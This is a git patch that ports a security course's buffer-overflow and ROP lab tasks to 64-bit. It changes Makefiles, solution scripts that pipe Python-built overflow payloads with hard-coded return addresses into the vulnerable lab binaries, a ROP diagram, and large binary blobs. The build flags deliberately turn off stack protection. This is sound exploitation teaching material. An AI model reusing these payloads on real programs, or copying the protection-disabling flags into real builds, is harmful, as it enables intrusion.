From 3df015f9eaf349b8329950b43fb40b9e3f8ef2a8 Mon Sep 17 00:00:00 2001 From: Nastyst16 Date: Fri, 25 Jul 2025 19:40:04 +0300 Subject: [PATCH] Port lab 12 tasks to 64-bit architecture: * Updated C sources, exploits and build scripts to 64-bit * Normalised line endings to Unix LF * Restored executable bits on shell scripts * Fixed typo in indirect-business README * Updated rip-my-buffers-off exploit with 64-bit addresses Signed-off-by: Cristian Nastase ' && git reset --soft origin/main --- labs/lab-12/media/rop-anatomy.svg | 6 +-- .../tasks/feeling-chained/solution/Makefile | 8 ++-- .../tasks/feeling-chained/solution/exploit.sh | 0 .../tasks/feeling-chained/solution/solve.sh | 5 ++- .../tasks/feeling-chained/support/buff-ovf3 | Bin 18424 -> 19736 bytes .../tasks/feeling-chained/support/exploit.sh | 0 .../feeling-chained/tests/graded_test.inc.sh | 0 .../feeling-chained/tests/run_all_tests.sh | 0 .../tasks/feeling-chained/tests/tests.sh | 0 .../hidden-in-plain-sight-1/solution/Makefile | 8 ++-- .../solution/README.md | 14 +++++- .../hidden-in-plain-sight-1/support/link | Bin 4832 -> 5208 bytes .../hidden-in-plain-sight-2/solution/Makefile | 8 ++-- .../solution/README.md | 27 ++++------- .../hidden-in-plain-sight-2/support/link2 | Bin 5124 -> 5600 bytes labs/lab-12/tasks/indirect-business/README.md | 16 ------- .../tasks/indirect-business/solution/Makefile | 8 ++-- .../indirect-business/solution/README.md | 10 +++++ .../indirect-business/solution/exploit.sh | 11 ----- .../tasks/indirect-business/solution/solve.sh | 1 - .../tasks/indirect-business/support/buff-ovf | Bin 19560 -> 19592 bytes .../indirect-business/support/exploit.sh | 11 ----- .../tasks/indirect-business/tests/Makefile | 7 --- .../tests/graded_test.inc.sh | 42 ------------------ .../indirect-business/tests/run_all_tests.sh | 21 --------- .../tasks/indirect-business/tests/tests.sh | 31 ------------- labs/lab-12/tasks/look-at-him-go/README.md | 2 +- .../look-at-him-go/solution/.gdb_history | 9 ++++ .../tasks/look-at-him-go/solution/Makefile | 8 ++-- .../tasks/look-at-him-go/solution/README.md | 20 ++++----- .../tasks/look-at-him-go/support/dynamic | Bin 19664 -> 18672 bytes .../tasks/playing-god/solution/Makefile | 8 ++-- .../tasks/playing-god/solution/dynamic2 | Bin 0 -> 18064 bytes .../lab-12/tasks/playing-god/support/dynamic2 | Bin 19264 -> 18064 bytes .../rip-my-buffers-off/solution/Makefile | 8 ++-- .../rip-my-buffers-off/solution/exploit.sh | 5 ++- .../rip-my-buffers-off/solution/solve.sh | 2 +- .../rip-my-buffers-off/support/buff-ovf2 | Bin 18468 -> 19792 bytes .../rip-my-buffers-off/support/exploit.sh | 0 .../tests/graded_test.inc.sh | 0 .../rip-my-buffers-off/tests/run_all_tests.sh | 0 .../tasks/rip-my-buffers-off/tests/tests.sh | 0 labs/lab-12/tasks/rop/solution/exploit.sh | 0 labs/lab-12/tasks/rop/support/exploit.sh | 0 .../lab-12/tasks/rop/tests/graded_test.inc.sh | 0 labs/lab-12/tasks/rop/tests/run_all_tests.sh | 0 labs/lab-12/tasks/rop/tests/tests.sh | 0 47 files changed, 89 insertions(+), 207 deletions(-) mode change 100755 => 100644 labs/lab-12/tasks/feeling-chained/solution/exploit.sh mode change 100755 => 100644 labs/lab-12/tasks/feeling-chained/support/exploit.sh mode change 100755 => 100644 labs/lab-12/tasks/feeling-chained/tests/graded_test.inc.sh mode change 100755 => 100644 labs/lab-12/tasks/feeling-chained/tests/run_all_tests.sh mode change 100755 => 100644 labs/lab-12/tasks/feeling-chained/tests/tests.sh delete mode 100755 labs/lab-12/tasks/indirect-business/solution/exploit.sh delete mode 100755 labs/lab-12/tasks/indirect-business/support/exploit.sh delete mode 100644 labs/lab-12/tasks/indirect-business/tests/Makefile delete mode 100755 labs/lab-12/tasks/indirect-business/tests/graded_test.inc.sh delete mode 100755 labs/lab-12/tasks/indirect-business/tests/run_all_tests.sh delete mode 100755 labs/lab-12/tasks/indirect-business/tests/tests.sh create mode 100644 labs/lab-12/tasks/look-at-him-go/solution/.gdb_history create mode 100644 labs/lab-12/tasks/playing-god/solution/dynamic2 mode change 100755 => 100644 labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh mode change 100755 => 100644 labs/lab-12/tasks/rip-my-buffers-off/support/exploit.sh mode change 100755 => 100644 labs/lab-12/tasks/rip-my-buffers-off/tests/graded_test.inc.sh mode change 100755 => 100644 labs/lab-12/tasks/rip-my-buffers-off/tests/run_all_tests.sh mode change 100755 => 100644 labs/lab-12/tasks/rip-my-buffers-off/tests/tests.sh mode change 100755 => 100644 labs/lab-12/tasks/rop/solution/exploit.sh mode change 100755 => 100644 labs/lab-12/tasks/rop/support/exploit.sh mode change 100755 => 100644 labs/lab-12/tasks/rop/tests/graded_test.inc.sh mode change 100755 => 100644 labs/lab-12/tasks/rop/tests/run_all_tests.sh mode change 100755 => 100644 labs/lab-12/tasks/rop/tests/tests.sh diff --git a/labs/lab-12/media/rop-anatomy.svg b/labs/lab-12/media/rop-anatomy.svg index 746ce0484..7512b0268 100644 --- a/labs/lab-12/media/rop-anatomy.svg +++ b/labs/lab-12/media/rop-anatomy.svg @@ -1,4 +1,4 @@ - - - + + +
High Addresses
High A...
Low Addresses
Low Ad...
Ret Address
Ret Address
4
4
Ret Address
Ret Address
rsp
rsp
gadget_addr
gadget_addr
3
3
New Gadget
New Gadget
gadget_addr:
    pop rdx  # rdx = 3
    pop rbx  # rbx = 4
    ret      # rip = New Gadget
gadget_addr:...
rdx
rdx
rbx
rbxText is not SVG - cannot display \ No newline at end of file diff --git a/labs/lab-12/tasks/feeling-chained/solution/Makefile b/labs/lab-12/tasks/feeling-chained/solution/Makefile index a83f61ab1..93f3ab7f7 100644 --- a/labs/lab-12/tasks/feeling-chained/solution/Makefile +++ b/labs/lab-12/tasks/feeling-chained/solution/Makefile @@ -1,6 +1,6 @@ CC = gcc -CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector -LDFLAGS = -no-pie -m32 +CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector +LDFLAGS = -no-pie -m64 SRC_DIR = . TARGET = buff-ovf3 OBJ = buff-ovf3.o @@ -8,10 +8,10 @@ OBJ = buff-ovf3.o all: $(TARGET) obfuscator: $(SRC_DIR)/obfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall deobfuscator: $(SRC_DIR)/deobfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall $(TARGET): $(OBJ) $(CC) $(LDFLAGS) $(OBJ) -o $(TARGET) diff --git a/labs/lab-12/tasks/feeling-chained/solution/exploit.sh b/labs/lab-12/tasks/feeling-chained/solution/exploit.sh old mode 100755 new mode 100644 diff --git a/labs/lab-12/tasks/feeling-chained/solution/solve.sh b/labs/lab-12/tasks/feeling-chained/solution/solve.sh index 0538bba2a..b57f15d44 100755 --- a/labs/lab-12/tasks/feeling-chained/solution/solve.sh +++ b/labs/lab-12/tasks/feeling-chained/solution/solve.sh @@ -1,7 +1,10 @@ #!/bin/bash # SPDX-License-Identifier: BSD-3-Clause -python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x56\x93\x04\x08" +python3 -c 'import sys; sys.stdout.buffer.write(b"A"*18 + b"\x96\x11\x40\x00" + b"\x00\x93\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ../support/buff-ovf3 + + +run < <(python3 -c 'import sys; sys.stdout.buffer.write(b"\x00"*18 + b"\x3c\x13\x40\x00\x00\x00\x00\x00" + b"\x00"*2000)') \ No newline at end of file diff --git a/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 b/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 index cad0d8c48b4ffb6baaabdfb0428501103c37dcde..01782392f796e00b1d58c88ac35c0201ce0a9369 100755 GIT binary patch literal 19736 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 literal 18424 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 literal 4832 zcma)9du$ZP8K1qo_1*gH^NW`;O^()tSMJU>1{@5*U=FaMyn<7pkoEd*?{4dRX?M>& z5-BZ)Dp!XpR8`ulL~W$}QK_i?CvDX9pBPFYq7RZvZBkJQMI>@smr@n=K_k)MH#=)D zq*6Mt`AKvMpRuWr@7=pM{)@(H^2SGRI`T8g>w9LzldoqpnN0P{ zKmYXh-RhOee?7eXLiJiTIXy8nUA;DW!zW!^K3Tm2!Jk_Y((5{&ye&;6r_b!UR~?!@ z{YK@+#L(@DX!%x}xlvJIZ7@C@Z4dNl}Y2lK-)k91A7nKVqo_wgbsZI-~>qC1x!~MaB zo_V5n-`azDrM!Q?7CW+V>*{j*%3)SUT?15P7LX467^@q?x_yod7+WXS(6*6@>ggAtAZ4nDIp?j zlphf&@6mfLCn4os*amtysZ)9>>&G~0RL&q;U>zrOlp92PIa#25nF6fmWRda@A{#h~ zDzA}QA1CcfEk)bJ$ui|b8fP;nk17!&TjuQtbSQHvz}7j3K)RK;iEQVy?oqB%v;j`m zD@%zChN&KXijT}$=mTo)5|Fg=Tha{kx#g6* zq!|f456Cm$7XWgw^;Ou_-XgP=k?buW?Dlj|6Haoc?zy-oiTC1a(s|{3D(Q7I=qy zZiF=OKDqmdw=E=XV=r8!U=2-*_PKPfDMFys6(RAR9c~&UTH8SL_MP3|)DI`AK15r~ zclL0z!K9WNzMaqJo0gDnj-a`wg_xN%SI~5`sas5%Cp-^8)gw1oYUwn&rIT+=uo z5$7>~WL>y7{8)IP1slGdg~N}-0uz6Pkwg{}Z19=}D3J#NsX{H1KN1c*-Vy{#y(d@? zOlxPOqu?#ju5U%5Bx#_9?CTd}hy?5+-5$q{tz^`&82L8FrH!rb{Fb)Tr27`UxEbmu zuZM2|W6cnR+(byg_}KwOD*R0^_h6y^PL$cleubVS{U=h7H~)}O@e>uxOyrG`L^hR5 z9P3%5uIY}MdOD}svAj{N982^hjAANZN$ZT83X&KxZ0nPfgnhh>mGD|(8ym&Zc#7s> z+3B>NiRb9U#VygrvRbxTN!jYwft^VRu&}c|co-!Jk(YJcQgzeJ8nd_XMGhU6Yfe<;d1G=Y)FIa&l*6HBS@A7vkpqbjiF-JtAG$o2l?gL3G+Ec=y{GXDD>m!;qPYEV5@EoCyQ&D4S2 zs;O&fwQQSAP31JB$SmW84pl-wRxX)#B3CNt2`yzMEW46U;Ga=2Y}3%=V_LqFFiNSs zmasKz)Jo(G6sH(7im`GYfnt`C&DpWegjLE{Y@<|Us+B{;kxGV-3sgrmOK15~F&pKt zN)bLqJsqX*fU4rXrkiG&Dy8+*nC-D717V9e>g-tE*&SWB59_*JvmJS?t7~~QR#?@Amt8698?ri*Hd3IPnaXXz z4>`7`I~vPIW0_(pwr8N<>0qf+qp`ACvh|c*GMTgZG`_P_-2Kcq7VU0cE?xw+tff~o zwNk8Ddb*1$MO7x75yY&NouXznb41JPD63dF`nfVs-sIqvmXE=<_4lufE<@7GKRsjI zXq_gV*vF)2LQ-2@An+W{k|@M<22$ha-ljSv7)=p!>DQ2xz0V4FM^WKG`*w-JBXB|sic{QhQspam_DUC&Idm{v_zuHd|<7!p!l z1@vJ`gM@HCE$|(IG0ee-2~ZWJAU=bHwfK|?q-z>+eBGFY6MQitO7e)1cMI$lxJ}?L zfkOfh3#5+=#j^#T6j&Abb%EyuzAW%30xt;sjlk;yKN3jyQi|_KUWAPTKO=C3z_kMD zhDLUK1wJKkRNygzrv-jP;P(Wc7x*)QZwjP~BE_W}G~r(a-W3=`ElEB{;9`Msf$Ig* zEtl-}2s|qAq`;R1{#fA81zr|-OCa46#};k91_U)1zxo8$dA_> z7zL;MBa2(d3pg5qw&`Hb?U{N$ZtKTv7U$<^e8jR?+$=eSlxcmWlEud_Q-TTaYa=73 